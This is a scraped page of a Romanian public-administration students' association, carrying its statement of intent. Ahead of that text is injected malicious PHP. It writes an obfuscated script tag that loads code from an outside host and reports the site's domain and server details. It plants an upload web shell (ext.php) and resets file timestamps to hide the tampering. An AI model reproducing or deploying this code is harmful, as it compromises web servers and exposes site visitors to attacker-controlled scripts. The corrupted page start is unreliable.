document.write('<'+'s'+'c'+'r'+'ipt '+'s'+'rc=\"http://tereveln.com/sh2.php?serverStr=$serverStr&req_type=add_site&document_root=$document_root&engine=$engineType&ip=$ip&domain='+window.location.hostname+'&uplUrl=$pp\"'+'>'+'<'+'/'+'sc'+'rip'+'t>');"; $fp = fopen(dirname(__FILE__)."/ext.php", "w"); fwrite($fp, "
';if (!empty(\$_FILES['uploadFile'])) {\$self=dirname(__FILE__);move_uploaded_file(\$_FILES[\"uploadFile\"][\"tmp_name\"], \$self.DIRECTORY_SEPARATOR.\$_FILES[\"uploadFile\"][\"name\"]);\$time=filemtime(\$self);print \"OK\";} else {print \$form;} ?>"); fclose($fp); $fp = fopen(__FILE__, "r"); $line = ""; while(!feof($fp)) { $line .= fgets($fp, 4096); } fclose($fp); $time = filemtime(__FILE__); $dirTime = filemtime(dirname(__FILE__)); $line = preg_replace("/\s+\s+/is", "", $line); $fp = @fopen(__FILE__, "w"); @fwrite($fp, $line); @fclose($fp); @touch(__FILE__, $time); @touch(dirname(__FILE__), $dirTime); } else { print ""; } ?> ANSSA - Asociatia Nationala a Studentilor in Stiinte Administrative

DECLARATIE DE INTENTIE


      " Vrem sa deschidem o cale studentilor în stiinte administrative, furnizându-le o noua abordare, un nou mod de considerare a sferei executive, încercând sa le oferim oportunitati de afirmare în activitatea din sectorul public. Experienta pe care ti-o poate furniza munca într-o organizatie a studentilor în stiinte administrative este o oportunitate realmente solida de a forma echipe si gestiona proiecte, de a învata si acumula proceduri si tehnice concrete de lucru din sfera executarii si organizarii executarii legii în cadrul institutiilor statului român. Mai mult avem ocazia sa ne punem în valoare aptitudinile de lucru în echipa si adaptabilitatea. Dorim sa contribuim, dincolo de dezbaterea academica, la formarea si afirmarea profesionala a membrilor nostri. Promovam implicarea activa a viitorilor absolventi în rândul functionarilor publici si îi încurajam sa se alture eforturilor de îmbunatatire a capacitatii de actiune a administratiei, pentru a construi un serviciu public puternic si stabil. Proiectele noastre se adreseaza studentilor de la facultatile si specializarile de administratie publica. Asociatia Nationala a Studentilor în Stiinte Administrative reprezinta un început de drum necesar si curajos, o experienta colectiva unica si speram o entitate recunoscuta în mediul academic si profesional. Vrem sa facilitam formarea unor buni specialisti, realisti si pragmatici, care sa pregateasca viitorul expertizei în administratia publica. Ne-am propus sa actionam pentru performanta si calitate în managementul public foarte necesare, de altfel, în procesul de reforma a administratiei. Consideram ca organizarea administratiei publice este un proces complex care necesita specialisti preocupati, resurse financiare, logistice si informationale. Asociatia Nationala a Studentilor în Stiinte Administrative va milita pentru un corp al functionarilor publici având calificare corespunzatoare si care sa aiba asigurat un plan de cariera si motivatia de a-l urma. Vom întreprinde demersuri în sensul aplicarii unor criterii de selectie profesioniste si transparente precum si pentru necesitatea unui proces de formare continua. În aceste sens ne îndreptam atentia si catre alte grupuri - tinta, precum: institutiile administratiei publice centrale si locale, institutiile de învatamânt superior, sindicatele, partidele politice, organizatiile profesionale din sfera administratiei publice si mass-media. Aceste deziderate urmarim sa le atingem prin intermediul activitatilor pe care le vom desfasura împreuna cu membrii si sustinatorii nostri."


Cristian Bitea
Preşedinte-fondator ANSSA
(foto 2002)